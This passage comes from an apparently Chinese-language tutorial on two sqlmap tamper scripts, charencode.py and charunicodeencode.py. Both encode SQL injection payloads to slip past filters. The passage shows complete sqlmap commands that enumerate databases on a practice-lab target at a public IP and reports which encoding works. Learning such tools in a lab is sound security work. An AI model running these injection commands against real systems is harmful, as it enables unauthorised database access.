8. charencode.py脚本
对所有的payload字符进行全部的url编码,已经编码的不处理,具体看如下演示
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="charencode.py" --proxy="http://127.0.0.1:8080" -batch
下面的演示的效果图:
发现是可以注入的,我们查看burp的抓包效果
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9. charunicodeencode.py脚本
对使用的payload非编码字符使用UnicodeURL编码,已经编码的不处理,这个跟上面提到的charencode.py脚本的区别就是在编码中增加了"u00" ,适用于所有数据库,具体看如下演示
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="charunicodeencode.py" --proxy="http://127.0.0.1:8080" -batch
下面的演示的效果图:
发现并不能注入成功,查看下burp抓包的情况
可以看到都添加了u00
网友评论